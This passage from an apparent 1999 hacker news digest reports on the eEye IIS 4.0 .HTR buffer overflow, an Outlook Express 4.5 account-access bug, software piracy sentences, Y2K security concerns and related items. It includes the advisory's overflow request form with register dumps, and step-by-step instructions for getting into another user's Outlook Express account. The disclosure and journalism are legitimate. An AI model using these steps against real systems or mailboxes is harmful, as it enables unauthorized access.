nuclear weapons research lab and other significant targets.
The prevailing assessment of intelligence agencies, strategic thinkers, and
scientists is that not only hackers and "crackers" (criminal hackers) but also
terrorists - individuals, groups, and state sponsors - are likely to exploit the
vulnerability of the world's computer systems to conduct electronic warfare.
It is estimated, for instance, that hostile perpetrators, with a budget of
around $10 million and a team of some 30 computer experts strategically
placed around the globe, could bring the US to its knees.
The threat of electronic terrorist assaults grows with each passing day. There
are three reasons for this:
* The globalization of the Internet. Internet users currently number over 120
million; an estimated 1 billion people will be using it by the year 2005. This
makes efforts to control Internet attacks a daunting challenge to intelligence
services and law-enforcement agencies.
* There are now some 30,000 hacker-oriented sites on the Internet, making
the tools of disruption and destruction available to almost anyone. The easily
available recipes for these new weapons - worms, Trojan horses, and logic
bombs, among others - are making this form of warfare a permanent fixture
of international life.
* With the Cold War now behind us, terrorist organizations have cast off the
limitations and ideologies of the formerly bipolar world and have become
multidirectional. These new political realities, coupled with easily accessible
cyber-weapons, have enhanced the threats posed by terror groups to the
degree that they could alter life on our planet forever.
The Internet already serves as an arena for propaganda and psychological
warfare. Ideological extremists such as neo-Nazi groups have called for
ethnic, racial, and religious violence. Traditional terrorist organizations, like
Hizbullah, which is supported by Iran and Syria, maintains on its Web site a
daily record of "heroic" battles of its fighters in southern Lebanon. And
Afghanistan, the newest state sponsor of terrorism, pushes its radical brand
of Islam on-line.
Terrorists have also used their laptops to store operation plans. Ramzi
Ahmed Yusuf, who is serving a life sentence the 1993 World Trade Center
bombing in New York and other terrorist crimes, used his computer to
develop a plot to blow up some dozen American airliners over the Pacific.
And terror networks, such as the underground infrastructure of Osama bin
Laden, who has been implicated in the US embassy bombings in Kenya and
Tanzania last summer, are sustained via personal computers with satellite
uplinks and encrypted messages.
Is the worst yet to come?
Consider waking one morning to the news that a group of terrorists
employing electronic "sniffers" have sabotaged the global financial system by
disrupting international fund-transfer networks, causing an unprecedented
stocks plunge on the New York, London, and Tokyo exchanges.
Clearly, there are numerous other devastating scenarios, including altering
formulas for medication at pharmaceutical plants; "crashing" telephone
systems; misrouting passenger trains; changing pressure in gas pipelines to
cause valve failure; disrupting operations of air-traffic control towers;
triggering oil refinery explosions and fires; scrambling the software used by
emergency services; turning off power grids; and simultaneously detonating
hundreds of computerized bombs around the world.
In sum, this new medium of communication, command and control,
supplemented by the repeated destructive keyboard attacks on civilian and
military nerve centers that we have already seen, forces us to think the
unthinkable - and take action to prevent it.
If the expanding electronic perils are ignored by the international community,
it is likely that the 21st century could produce a global Waterloo for
civilization.
(The writer is a professor and the director of the Inter-University Center for
Terrorism Studies - Israel and the United States.)
@HWA
44.0 Major Remote Hole Found in IIS
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by Marc
eEye Digital Security Team has found a major remotely
exploitable hole in Microsoft's Internet Information
Server. The buffer overflow of ISM.dll leaves
approximately 90% of 1.3 million Microsoft web servers
vulnerable to internet attack. The folks at eEye have
graciously developed an exploit script to demonstrate
this hole. Microsoft has provided a work around and is
working on a patch.
eEye Digital Security Team
http://www.eeye.com/database/advisories/ad06081999/ad06081999.html
Wired
http://www.wired.com/news/news/technology/story/20231.html
Microsoft
http://www.microsoft.com/security/bulletins/ms99-019.asp
eEye;
Retina vs. IIS4, Round 2
Systems Affected:
Internet Information Server 4.0 (IIS4)
Microsoft Windows NT 4.0 SP3 Option Pack 4
Microsoft Windows NT 4.0 SP4 Option Pack 4
Microsoft Windows NT 4.0 SP5 Option Pack 4
Release Date:
June 8, 1999
Advisory Code:
AD06081999
Description:
We have been debating how to start out this advisory. How do
you explain that 90% or so of the Windows NT web servers on the
Internet are open to a hole that lets an attacker execute arbitrary
code on the remote web server? So the story starts...
The Goal:
Find a buffer overflow that will affect 90% of the Windows NT web
servers on the Internet. Exploit this buffer overflow.
The Theory:
There will be overflows in at least one of the default IIS filtered
extensions (i.e. .ASP, .IDC, .HTR). The way we think the exploit
will take place is that IIS will pass the full URL to the DLL that
handles the extension. Therefore if the ISAPI DLL does not do
proper bounds checking it will overflow a buffer taking IIS
(inetinfo.exe) with it and allow us to execute arbitrary code on the
remote server.
Entrance Retina:
At the same time of working on this advisory we have been
working on the AI mining logic for Retina's HTTP module. What
better test scenario than this? We gave Retina a list of 10 or so
extensions common to IIS and instructed it to find any possible
holes relating to these extensions.
The Grind:
After about an hour Retina found what appeared to be a hole. It
displayed that after sending "GET /[overflow].htr HTTP/1.0" it had
crashed the server. We all crossed our fingers, started up the
good ol' debugger and had Retina hit the server again.
Note: [overflow] is 3k or so characters... but we will not get into
the string lengths and such here. View the debug info and have a
look for yourself.
The Registers:
EAX = 00F7FCC8 EBX = 00F41130
ECX = 41414141 EDX = 77F9485A
ESI = 00F7FCC0 EDI = 00F7FCC0
EIP = 41414141 ESP = 00F4106C
EBP = 00F4108C EFL = 00000246
Note: Retina was using "A" (0x41 in hex) for the character to
overflow with. If you're not familiar with buffer overflows a quick
note would be that getting our bytes into any of the registers
is a good sign, and directly into EIP makes it even easier :)
Explain This:
The overflow is in relation to the .HTR extensions. IIS includes the
capability to allow Windows NT users to change their password
via the web directory /iisadmpwd/. This feature is implemented as
a set of .HTR files and the ISAPI extension file ISM.DLL. So
somewhere along the line when the URL is passed through to
ISM.DLL, proper bounds checking is not done and our
overflow takes place. The .HTR/ISM.DLL ISAPI filter is installed
by default on IIS4 servers. Looks like we got our 90% of the
Windows NT web servers part down. However can we exploit this?
The Exploit:
Yes. We can definitely exploit this and we have. We will not go
into much detail here about how the buffer is exploited and such.
However, one nice thing to note is that the exploit has been
crafted in such a way to work on SP4 and SP5 machines,
therefore there is no guessing of offsets and possible accidental
crashing of the remote server.
Click here for more details about the exploit and the code.
The Fallout:
Almost 90% of the Windows NT web servers on the Internet are
affected by this hole. Even a server that's locked in a guarded
room behind a Cisco Pix can be broken into with this hole. This is
a reminder to all software vendors that testing for common
security holes in your software is a must. Demand more from
your software vendors.
The Request. (Well one anyway.)
Dear Microsoft,
One of the things that we found out is that IIS did not log any
trace of our attempted hack. We recommend that you pass all
server requests to the logging service before passing it to any
ISAPI filters etc...The logging service should be, as named, an
actual service running in a separate memory space so that when
inetinfo goes down intrusion signatures are still logged.
Retina vs. IIS4, Round 2. KO.
Fixes:
1.Remove the extension .HTR from the ISAPI DLL list.
Microsoft has just updated their checklist to include this
interim fix.
2.Apply the patch supplied by Microsoft when available.
Vendor Status:
We contacted Microsoft on June 8th 1999, eEye Digital Security
Team provided all information needed to reproduce the exploit.
and how to fix it. Microsoft security team did confirm the exploit
and are releasing a patch for IIS.
Related Links
Retina - The Network Security Scanner
http://www.eEye.com/retina/
Retina - Brain File used to uncover the hole
http://www.eEye.com/database/advisories/ad06081999/ad06081999-brain.html
Exploit - How we did it and the code.
http://www.eEye.com/database/advisories/ad06081999/ad06081999-exploit.html
NetCat - TCP/IP "Swiss Army knife"
http://www.l0pht.com/~weld/netcat/
Greetings go out to:
The former Secure Networks Inc., L0pht, Phrack, ADM, Rhino9,
Attrition, HNN and any other security company or organization
that believes in full disclosure.
Copyright (c) 1999 eEye Digital Security Team
Permission is hereby granted for the redistribution of this alert
electronically. It is not to be edited in any way without express
consent of eEye. If you wish to reprint the whole or any part of
this alert in any other medium excluding electronic medium,
please e-mail alert@eEye.com for permission.
Disclaimer:
The information within this paper may change without notice. Use
of this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.
Please send suggestions, updates, and comments to:
eEye Digital Security Team
info@eEye.com
www.eEye.com
-=-
Wired;
E-Commerce Sites: Open Sesame?
by Niall McKay
11:40 a.m. 15.Jun.99.PDT
A major security flaw in a Microsoft Web
server could allow crackers to take
complete control of e-commerce Web
sites, security experts warned Tuesday.
The flaw in Microsoft's Internet
Information Server 4.0 allows
unauthorized remote users to gain
system-level access to the server,
according to Firas Bushnaq, CEO of eEye,
the Internet security firm that discovered
it.
"This hole is so serious it's scary," said
Jim Blake, a network administrator for
Irvine, a city in southern California.
"With other [Windows NT] security holes,
crackers have needed to gain some level
of user access before executing code on
the server. This is different.... Anybody
off the Web can crack IIS," he said.
More than 1.3 million Microsoft IIS servers
are up and running on the Web. Nasdaq,
Walt Disney, and Compaq are among the
larger e-commerce operations run off the
server, according to NetCraft Internet
surveys.
Microsoft confirmed that the problem
exists and said that it is working on a fix.
Customers, however, have not been
notified.
"Normally we will post the problem and
the bug fix at the same time," said
Microsoft spokeswoman Jennifer Todd.
"We take these security issues very
seriously, and the patch will be available
[soon]."
The fix will be posted to Microsoft's
security Web site, "probably in the next
couple of days," Todd said.
The exploit is just one of a long list of
security flaws affecting IIS 4.0. In May,
security experts found an exploit that
enabled crackers to gain read access to
files held on IIS when they requested
certain text files.
Last summer, an exploit known as the
$DATA Bug granted any non-technical
Web users access to sensitive information
within the source code used in Microsoft's
Active Server Page, which is used on IIS.
And in January, a similar IIS security hole
was discovered, one that exposed the
source code and certain system settings
of files on Windows NT-based Web
servers.
But the latest problem appears to be the
most serious because of the level of
access it reportedly allows.
"The exploit gives crackers access to any
database or software residing on the Web
server machine," said Bushnaq. "So they
could steal credit-card information or
even post counterfeit Web pages."
For instance, crackers could exploit the
bug to modify stock prices at one of the
many news and stock information sites
running IIS.
The hole allows remote users to gain
control of an IIS 4.0 server by creating
what is known as a "buffer overflow" on
.htr Web pages -- an IIS feature
designed to enable users to remotely
change their passwords.
A buffer overflow can occur when a
system is fed a value much larger than
expected. In the case of the bug, the
Dynamic Link Library (DLL) governing the
.htr file extension, called ISM.DLL, can be
overloaded by running a utility that loads
too many characters into the library.
Once overloaded, the DLL is disabled and
the content of the overflow "bleeds" into
the system.
"Normally, this would just crash the
system," said Space Rogue, a member of
L0pht Heavy Industries, an independent
security consulting firm that last year
testified before the United States Senate
on government information security.
"But a good cracker can write an exploit
where the data that overflows will
actually be a executable program that will
run as machine code," said Space Rogue.
Such a move could give a cracker
complete control of the target system.
The overflow executable program can be
used to run a system-level program that
will deliver the equivalent of a DOS
command window to an attacker's PC.
To demonstrate the hole, eEye wrote a
program called IIS Hack that will enable
users to crack and execute code on any
IIS 4.0 Web Server.
However, disabling or removing the .htr
password utility will not fix the problem,
according to Bushnaq. "You have got to
go through a series of steps to remove
the faulty [code]."
Eeye discovered the problem while beta
testing a network security auditing tool.
"Remote exploits are about the most
serious problems you can have with a
Web server," said Space Rogue. "It gives
the attacker root privileges, so the
cracker not only has access to the IIS
server but [to] software running on that
machine."
"In many corporate sites today, this will
give the cracker access to the entire
network."
Eeye is a software development firm
specializing in security audit tools. Chief
executive Bushnaq previously founded the
electronic commerce site ECompany.com.
-=-
@HWA
45.0 Outlook Express 4.5 Email Bug
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by deepquest
Maccentral.com is reporting on a bug in Outlook Express
4.5. Basically what it comes down to is if your machine
has more than one email account, and you know the
password for one account then you can gain access to
all the accounts. Pretty damaging hole for multi users
machines.
MacCentral Online
http://www.maccentral.com/news/9906/15.sonata.shtml
Email encryption problems should be solved in Sonata
by Dennis Sellers, dsellers@maccentral.com
June 15, 1999, 9:45 am ET
If you're using a free Mac email application, you inherently have a lack of secure
encryption as Andrew Jung, a computer science student at Camosun College
(Victoria BC, Canada), recently discovered. Jung was using Outlook Express 4.5
on the family iMac when he came upon what he described a "disturbing bug."
Jung attempted to use the "Change Current User" menu item of Outlook Express
to access his personal email account (three separate email accounts were on the
family Mac) when he realized he'd forgotten his password. He clicked "Cancel"
was returned to the account selection dialog.
"I selected my step father's account, typed in his password, and got a message
saying that his password was incorrect," Jung says. "I try again and again. No go.
Then for the heck of it I looked up my password for my account, tried it, and got
it. I did the procedure again over and over, and I can reproduce it every time.
Whatever account I click and then cancel, that is the password for all the
accounts."
The situation can be reproduced this way:
- Open Outlook Express and at the user account dialog select "New User."
In the settings type in any password you want.
- Select change user from File.
- Select the newly created account, then click "OK."
- Click cancel at the password prompt.
- Select the user's account you would like to break into, and click "OK."
- Type in YOUR password for the new account and you're in.
DON'T try this at work or to access anyone's email account without permission.
This was for "demonstration purposes" only.
MacCentral contacted the Microsoft Macintosh Business Unit at Microsoft, and
Product Manager Irving Kwong confirmed the problem. He says Outlook Express
doesn't encrypt mail data stored in the application - but that the problem isn't
unique to Microsoft's free email application.
"Encryption functionality of mail data does not exist in any free Macintosh email
application, as this level of security is best executed at the operating system level,"
Kwong says. "Outlook Express' password protection between multiple users on
the same computer is not secure. The password merely acts as a padlock on
users' personal preferences."
So what is a secure solution? Kwong says it's coming with the next ramp of the
Mac OS, codenamed Sonata.
"You may remember Sonata's new multiple user environment being demonstrated
at the WWDC," Kwong says (check out our story at
http://www.maccentral.com/news/9905/10.sherlock.shtml). "We have been
working on support for Sonata's multi-user functionality for Outlook Express and
demonstrated this technology at the WWDC. This is the first offering of
system-level security for multiple users sharing a Macintosh and is the best solution
for true support, as it ensures password and data security. For Outlook Express
customers and Macintosh users looking for a password secure solution for multiple
users sharing a computer, we suggest using the upcoming version of Outlook
Express with Sonata. The combination of Outlook Express and Sonata is a secure
solution for Macintosh users doing email from the same computer. "
Sonata is due in the second half of the year.
@HWA
46.0 Major Pirates Convicted
~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by Warez Dude
Texan Convicted of Pirating $63mil, in Germany.
A German State court has sentenced a Texas man to
four years in prison for three counts of counterfeiting
Microsoft programs. Microsoft said that this case was
the "biggest in terms of the operation's sophistication
and the magnitude of damage."
Nando Times
http://www.techserver.com/story/body/0,1634,60053-95659-682086-0,00.html
Wired
http://www.wired.com/news/news/politics/story/20239.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2276234,00.html
Father and Son, Busted.
Father and son where convicted in Massachusetts of
conspiring to sell $20 million in stolen Microsoft
Software. The father was fined over $1 Million and
sentenced to almost six years in jail, the son was fined
$100,000 and got ten months in jail.
Nando Times
http://www.techserver.com/story/body/0,1634,60069-95685-682199-0,00.html
Nando Times;
Texan convicted of software piracy in Germany
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press
AACHEN, Germany (June 15, 1999 3:33 p.m. EDT http://www.nandotimes.com) - A German state court convicted John-Joseph Staud, a
Texas man, on Tuesday of counterfeiting more than $63 million worth of Microsoft computer programs.
Staud, 39, was sentenced to four years in prison for three counts of counterfeiting patented programs and smuggling them into
Germany for commercial purposes.
Microsoft Corp. greeted the court's decision as "a meaningful signal" toward thwarting computer piracy. The software giant, based in
Washington state, said the counterfeit case was its biggest in terms of the operation's sophistication and the magnitude of damage.
The court denied Microsoft's request for damages, saying that should be handled by a court in England, where Staud allegedly ran a counterfeit
compact disc production plant and printing operation. He also faces charges in England.
Charges against Staud stemmed from a German customs office investigation last August that uncovered 300,000 counterfeited CD-ROMs with
programs such as MS Office, Windows 95, and Windows NT, along with 400,000 installation handbooks.
The materials, which had been smuggled into Germany, were found in a rented container and a warehouse in the town of Kreuzau, about 20
miles east of Aachen, which is located on the border with Belgium.
-=-
Wired;
Germany Jails Software Pirate
Reuters
4:30 p.m. 15.Jun.99.PDT
A German court sentenced an American
man to four years in prison without
probation Tuesday for importing illegally
copied Microsoft computer software.
It was the first time Germany has issued
a prison sentence in a crime involving
software piracy, Microsoft (MSFT) said.
"The 39-year-old Texan was sentenced
today for four years without probation," a
spokesman for the German regional court
of Aachen said.
The sentencing of the man, identified
only as John S., follows the seizure by
German customs officials of thousands of
illegal copies of Microsoft software
programs and manuals last August.
Microsoft said fraud was proved in several
instances in the case, with total damages
amounting to about 120 million marks
(US$64 million).
"This sentence is a breakthrough in
Germany and shows that counterfeiting
software is really a serious crime," Rudolf
Gallist, general manager of Microsoft
GmbH, said in a statement.
- - -
More MS Software Pirates Jailed: Three
more defendants in the "Crazy Bob's"
stolen software ring were sentenced this
week, federal prosecutors said Thursday.
The three are the latest to be sentenced
for their part in a conspiracy to sell
US$20 million in Microsoft Corp. software
stolen from a Massachusetts disc
manufacturer.
Marc Rosengard, an employee of Crazy
Bob's discount computer shop in
Wakefield, Mass., was sentenced on
Thursday to 33 months in prison and
three years supervised release, and must
pay $20,000 in restitution to Microsoft,
prosecutors said. Another defendant,
Maxine Simons, 59, was sentenced on
Wednesday by US District Court Judge
George O'Toole to two years and nine
months in prison and ordered to pay
restitution of $908,000, prosecutors said.
Her husband Robert Simons, who ran
Crazy Bob's, was given a 70-month prison
sentence on Tuesday. Their son, William
Simons, was sentenced to one year and
10 months on Tuesday. Also sentenced
on Wednesday was Gerald Coviello, 62, to
two years and six months in prison.
Maxine Simons and Coviello were
convicted of conspiracy to transport
stolen property following a three-week
jury trial in March. Among other misdeeds,
Crazy Bob's was accused of buying and
reselling 32,000 stolen copies of Microsoft
Office 97 Professional Edition. Worth $599
apiece, they were acquired from rogue
former employees of KAO Infosystems of
Plymouth, Massachusetts, which
manufactured the discs.
Copyright© 1999 Reuters Limited.
-=-
Nando Times #2
Sellers of $20 million of stolen software sentenced to prison
Copyright © 1999 Nando Media
Copyright © 1999 Reuters News Service
BOSTON (June 15, 1999 4:04 p.m. EDT http://www.nandotimes.com) - A father and son pair accused of conspiring to sell more than $20
million in Microsoft Corp. software stolen from a Massachusetts manufacturer were sentenced to prison, prosecutors said
Tuesday.
Robert Simons, 62, who ran Crazy Bob's discount software store in Wakefield, Massachusetts, was sentenced to five years and 10 months
imprisonment by U.S. District Judge George O'Toole Monday. Simons was also ordered to pay $908,000 in restitution to Microsoft and to forfeit
$440,000 to the federal government.
His son, William Simons, 35, a Crazy Bob's salesman, was sentenced to one year and 10 months in prison, and must pay $100,000 to
Microsoft, prosecutors said.
Crazy Bob's was accused of buying millions of dollars worth of computer discs stolen from KAO Infosystems, a disc manufacturer in Plymouth,
Massachusetts, by two ex-KAO workers.
The two former KAO employees pleaded guilty to related charges and were awaiting sentencing, prosecutors said.
Among other misdeeds, the Simons were accused of buying 32,000 stolen copies of Microsoft Office 97 Professional Edition, worth $599
apiece, and reselling them to CD-ROM outlets in California and Great Britain, prosecutors said.
@HWA
47.0 Fear of Y2K Raises Security Concerns
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by roach
Australia Concerned Over Y2K and Security
Fear that the Y2K bug will cause weaknesses in
computer security are being raised. Some companies are
spending money on Y2K issues and are ignoring
important security issues. The fear is that cyber attacks
may be misinterpreted as run of the mill Y2K problems.
Australia News
http://technology.news.com.au/techno/4297150.htm
Australian Financial Review
http://www.afr.com.au/content/990615/update/update38.html
DOD Plans for Possible Y2K Attack
The US DOD has started evaluating possible scenarios
for cyber attacks that may be masquerading as Y2K
computer glitches. While not saying how possible such
an attack may be DOD said it is just being prepared for
any contingency.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-cybery2k-6-15-99.html
Australian News;
Bug scare aids cyber terror
By STEFANIE BALOGH
16jun99
THE Y2K bug has left computer systems around the world vulnerable to
cyber terrorist attacks when the new millennium dawns, an international
computing expert warned yesterday.
Constance Fortune, vice-president of Canada's Science Applications
International Corporation, said because companies had focused
resources on Y2K compliance, they had left their operations open to
other security risks.
Speaking at the 11th FIRST (Forum for Incident Response Security
Team) computer security conference in Brisbane, Ms Fortune said
amateur hackers and cyber criminals were poised to wreak havoc on
New Year's Day and beyond. She predicted the problems could be more
disastrous than any virus because multinational and government
computer systems would be at their weakest.
"Those who create viruses, worms and other destructive computer
phenomena have found ways to take advantage of the Y2K problem,"
she warned.
Ms Fortune said it was crucial for computer emergency response teams
to be able to determine whether system failure was the result of Y2K
problems or camouflaged security attacks.
Ms Fortune also said northern hemisphere firms would closely watch as
Australia embraced the millennium, hours before the US, Europe and
Britain.
"What happens in Australia as 2000 rolls in will provide us with a
much-appreciated early warning of what we can expect only hours
later," she said.
Her warnings were echoed by information technology security expert Bill
Caelli, who predicted the security problems caused by companies
focusing on Y2K compliance could continue for 12-18 months.
Professor Caelli, from the Queensland University of Technology, also
said business and government had "lost 20 years" of work on computer
security because they were more interested in cost-cutting.
He also called for the Australian Government to introduce tougher
legislation to force companies to upgrade information security and for
the Government to end the practice of outsourcing its IT capabilities.
-=-
Federal Computer Week;
JUNE 15, 1999 . . . 16:33 EDT
DOD preps for possible cyberattacks brought on
by Y2K
BY BOB BREWIN (antenna@fcw.com)
The Pentagon has started to develop plans that would shut back doors that
hook its global networks to the Internet in case cyberfoes try to use any Year
2000 computer date code snafus to mount a cyberattack.
Marvin Langston, deputy assistant secretary of Defense for command, control
communications and intelligence, declined to estimate the possibility of such a
cyberassault. He said the Pentagon has started to develop contingency plans
to protect its networks at the end of the year in case "cyberattackers try to
mask themselves in the confusion."
"We want to be able to close down our back doors," said Langston, speaking
at GovTechNet, a Washington, D.C., conference sponsored by FCW and the
Armed Forces Communications and Electronics Association.
Langston said hacker Web sites and discussion groups have mentioned seizing
the opportunity to launch cyberattacks against DOD by using any computer or
network that may be malfunctioning because of Year 2000 problems.
DOD "has to be prepared to deal with it," Langston said.
-=-
@HWA
48.0 Israeli Banks Thwart Attempted Cyber Break-In
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by LirA
Buried down in the fifth paragraph is a statement by
Bank of Israel Supervisor of Banks Dr. Yitzhak Tal, who
claims that the Israeli banking system has been the
target of "primitive and insignificant" cyber attacks.
Israel's Business Arena
http://www.globes.co.il/cgi-bin/Serve_Archive_Arena/pages/English/1.2.1.20/19990614/1
Tuesday , Jun 15, 1999 Sun-Thu at 18:00 (GMT+2)
Headlines
Tal: Hackers Tried to Break Into
Internet Banking Services
By Zeev Klein
Bank of Israel Supervisor of Banks Dr. Yitzhak
Tal is opposed to mergers between large banks,
because the Israeli banking system is still too
centralist. Briefing economic correspondents
yesterday upon the publication of the annual
banking system report for 1998, Tal said, "It’s
impossible to draw comparisons between Israel
and the US or Europe. There, too, it’s still not
clear what’s the cause for bank mergers. We’re
different from them, and we must be more
careful."
According to Tal, mergers between small banks
are not really beneficial. "I’m in favor of mergers
between small banks, and against mergers
between big banks. But a small bank plus a
small bank gives yet another small bank," Tal
said.
As for mergers between medium-size banks, Tal
said that the issue is under examination by the
Bank of Israel. He stressed, however, that "at
the moment we’re not faced with any specific
request on which we must take a decision. We
are rather seeking to work out our position in
principle on the issue. There are arguments both
ways. On the one hand, mergers between
medium-size banks will increase the centralism
of the system, which is very considerable as it
is. On the other hand, it may well be that a new
banking player that would compete with the
large banks will enhance competitiveness. Our
key consideration is improving competition,
rather than stability," Tal said.
Referring to the expansion of Internet banking
services, Tal said, "We don’t have to be the trail
blazers on Internet worldwide. We must be
cautious, and see how this area develops
throughout the world."
Tal disclosed that hackers had recently
attempted to break into the Internet banking
system, but added that the efforts were primitive
and insignificant, and did not result in any real
damage to customers or to the banks.
Tal did not expect any Y2K-related massive
malfunction that might wipe out public deposits.
According to him, "Public deposits aren’t going
to be virtually wiped out.." Tal added that the
banks are taking the proper measures to cope
with Y2K.
Published by Israel's Business Arena June 14,
1999
@HWA
49.0 Navy Wants Tighter Network Security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 16th 1999
From HNN http://www.hackernews.com/
contributed by Lif3r
The US Navy is looking into adding real-time intrusion
detection capabilities into its network defenses.
Federal Computer Week
http://www.fcw.com:80/pubs/fcw/1999/0614/web-navy-6-15-99.html
JUNE 15, 1999 . . . 12:55 EDT
Navy looks to upgrade network security
BY DIANE FRANK (diane_frank@fcw.com)
As part of its overall security strategy, the Navy is looking at several new
auditing products that can offer real-time intrusion detection.
The Navy is using the auditing and other security features that are part of
Microsoft Corp.'s Windows NT and variations of the Unix operating system.
But the Navy can only use that technology to find out about intrusions into a
network after the fact, Cmdr. Larry Downs, director of operations for the
Navy Fleet Information Warfare Center, said today at the GovTechNet
conference in Washington, D.C.
Companies recently have released several products that will enable Navy
network administrators to learn about intrusions and attacks as the attacks
occur. The Navy is interested in incorporating the products into its network
security, Downs said.
"The Navy is looking closely at this and will probably look to buy in the very
near future," he said.
@HWA
50.0 IIS Hole Continues to Make News/Fix Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by Marc
The major hole publicly announced yesterday by eEye
Digital Security Team in Microsofts Internet Information
Server is continuing to make news.
Internet News
http://www.internetnews.com/prod-news/article/0,1087,9_139231,00.html
ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2277295,00.html
eEye Releases Fix
Microsoft has issued a workaround for this bug however
it does break functionality such as /iisadmpwd/. eEye
Digital Security Team has released their own fix that
resolves the problem and preserves functionality. It
limits .htr requests to 200 characters, and logs the IP
address of the person trying the overflow. This is a
great deal better then the current recommendation from
Microsoft which is to just remove the .htr ISAPI filter.
eEye Digital Security Team
http://www.eeye.com/database/advisories/ad06081999/ad06081999-ogle.html
Microsft
http://www.microsoft.com/security/bulletins/ms99-019.asp
CERT Advisory Released
A day late and a dollar short CERT (Computer
Emergancy Responce Team) has released an advisory
concerning this major problem. Unfortunatly they forgot
to credit who found the problem.
CERT
http://www.cert.org/advisories/CA-99-07-IIS-Buffer-Overflow.html
Irresponsible Security Companies
This article on C|Net questions whether eEye did the
right thing by releasing their advisory before Microsoft
was ready with their patch. A quote in the article from a
Microsoft representative called this "contrary to all of
the normal rules of responsible security professionals."
[rant on] Bullshit. The company that has shown the
public how irresponsible they are is Microsoft. Microsoft
knew about this problem for a week but did nothing until
it was released to the public. It is extremely likely that
someone else found this hole and did not tell anyone.
They could have used this problem to install back doors
on most of the servers in the world without anyone
knowing. Microsoft could have stopped this action a
week earlier and didn't. Microsoft is the one who is not
acting like a 'responsible security professional'.[/rant
off]
C|Net
http://www.news.com/News/Item/0,4,37949,00.html?st.ne.fd.mdh.ni
C|Net;
Microsoft server bug wrongly publicized?
By Stephanie Miles, Stephen Shankland, and Wylie Wong
Staff, CNET News.com
June 16, 1999, 6:50 p.m. PT
Microsoft offered a temporary fix for a problem with its Web server software that lets attackers "inject" a program that
can run on a Windows NT-based system.
In the meantime, the manner in which the bug was reported and publicized is generating controversy.
The bug attacks Internet Information Server, Microsoft's software for serving up Web pages. Putting the right type of malicious
code into a page request can cause IIS to crash, or worse, let an attacker run whatever
programming code he wants.
Firas Bushnaq, CEO of Eeye, today accused Microsoft of dragging its feet to solving the problem.
His company alerted Microsoft on June 8, he said, but Microsoft told him to keep quiet about it.
Bushnaq said he went public yesterday because he felt Microsoft wasn't doing anything to resolve
the issue.
But Bushnaq didn't stop at just publicizing the bug, and that's where the controversy comes in:
EEye posted a program that will exploit the weakness, a move Microsoft says runs contrary to
established procedures for reporting and patching bugs.
Not surprisingly, Microsoft disputes Bushnaq's version of the story.
"You can send a 'malformed' or very long request to a Web server. It could cause a buffer overflow,
which means you can embed application code that will execute on the server," Bushnaq explained
of the bug.
"Anything that is residing on the Web server and everything connected to that--back-end databases, e-commerce information,
credit card information--could be accessible," he continued. "It is extremely important for people to fix it."
"We've got a security response process that we set up a year ago so that customers would have a place to report bugs and so
that we could respond to it quickly," countered Scott Culp, a security product manager for Microsoft. No confirmed problems
occurring as a result of the bug have been reported, he said.
"For reasons we don't understand, at the beginning of this week they [Eeye] suddenly went public with the bug. It's contrary to all
of the normal rules of responsible security professionals," he said. "You don't provide tools that malicious users can use to hurt
innocent people."
Microsoft rushed to post a workaround to the problem, but a true fix to patch the bug is not yet available. The workaround will
protect users from malicious or arbitrary code, Culp said.
"We're completing the patch right now, but we need to make sure that we've fully tested it. In the meantime, nobody needs to be
vulnerable because of the workaround," he said.
@HWA
51.0 World Braces for International Day of Action
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by barbie
Officials in Australia and around the world are bracing
for International Day of Action on June 18th known as
J18. June 18 is also the same day as the G8 meeting in
Cologne, Germany. J18 organizers are calling for
disruption of financial centers, banking districts and
multinational corporate power bases. Examples of
possible activities include picketing, street parties,
leafleting, rallies, marches, strikes, carnivals, and of
course 'hacking'.
Australian Financial Review
http://www.afr.com.au/content/990616/update/update37.html
Australian Financial Review - Yes, there are two stories
J18 hackers 'could target Australia'
on Friday
Australian companies could be targeted by computer
hackers this Friday as part of an international day of
action against big business, a computer security
conference was told today.
But for those companies without adequate computer
security, it may be too late to bolster defences, Byron
Collie, from Australian Federal Police's national
computer crime team said.
Mr Collie told the conference the international day of
action on Friday, known as J18, could include
cyberattacks on business and banking computer
networks.
The J18 action coincides with the G8 meeting in
Cologne, Germany.
The official J18 site on the Internet calls for people to
plan individual "actions" focusing on disrupting "financial
centres, banking districts and multinational corporate
power bases".
"It is up to the groups themselves to decide what to do
on the day," it says.
"Examples could include picketing, street parties,
leafleting, rallies, marches, strikes, carnivals, hacking,
blockades, whatever."
Mr Collie said there was a growing trend for computer
hacking to be politically motivated and for a number of
hackers to work in cooperation.
"Motivation for these (hacking) activities have changed
slightly from the usual teenage intruder-type activity," he
told the Computer Security Incident Handling and
Response conference.
"There's a lot more political and issue motivated
activities."
Mr Collie said one example of "hackdivism" occurred
during the Kosovo conflict when a Serbian computer
expert distributed an e-mail calling for all Serbs
throughout the world to launch a concentrated
cyberattack on the computer systems of NATO
countries.
Late last year, as Indonesia was preparing for its
elections, hackers shut down an East Timorese website
based in Ireland, he said.
"I would hope that you have every measure already in
place," he told the conference delegates.
AAP
@HWA
52.0 ECD Targets Mexican Government
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
June 17th 1999
From HNN http://www.hackernews.com/
contributed by stealth
